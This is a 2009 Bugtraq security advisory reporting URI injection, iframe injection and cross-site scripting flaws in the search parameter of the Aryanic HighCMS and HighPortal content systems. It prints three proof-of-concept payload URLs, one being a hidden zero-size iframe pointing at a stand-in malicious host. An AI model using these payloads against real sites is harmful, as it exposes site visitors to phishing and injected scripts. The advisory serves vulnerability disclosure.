Aryanic HighCMS and HighPortal multiple Vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Aryanic HighCMS and HighPortal multiple Vulnerabilities
From: mr.faghani@xxxxxxxxx
Date: 10 Mar 2009 13:19:10 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

================= IUT-CERT =================

 Title: Aryanic HighPortal, HighCMS Multiple Vulnerabilities
        
 Vendor: www.aryanic.com
 Vulnerable Version: 10 and priors
 Type: Input.Validation.Vulnerability (URI Injection, Frame Injection, XSS)
 Fix: N/A

================== nsec.ir =================

Description:
------------------

        Aryanic is the leading CMS producer in Iran. Search page in HighCMS and 
HighPortal
        products are vulnerable to multiple input validation vulnerabilities.



Vulnerability Variant:
------------------

        1- URI Injection "/web_search.aspx" in "q" parameter.
        http://example.com/includes/web_search.aspx?id=1&q=";<a 
href="http://www.malicious.com";>clickme</a>
        
        2- iFrame Injection "/web_search.aspx" in "q" parameter.
        http://example.com/includes/web_search.aspx?id=1&q="iframe src 
="http://www.malicious.com"; width="0" height="0"></iframe>

        3- Cross Site Scripting "/web_search.aspx" in "q" parameter.
        
http://example.com/includes/web_search.aspx?id=1&q=";<script>alert(12345)</script>



Solution:
------------------

                Input validation of Parameter "q" should be corrected.


Credit: 
------------------
Isfahan University of Technology - Computer Emergency Response Team
Thanks to : E. Jafari, N.Fathi, M. R. Faghani

Prev by Date: SEC Consult SA-20090305-0 :: NextApp Echo XML Injection Vulnerability
Next by Date: SEC Consult SA-20090305-2 :: IBM Director CIM Server Local Privilege Escalation Vulnerability
Previous by thread: SEC Consult SA-20090305-0 :: NextApp Echo XML Injection Vulnerability
Next by thread: SEC Consult SA-20090305-2 :: IBM Director CIM Server Local Privilege Escalation Vulnerability
Index(es):
- Date
- Thread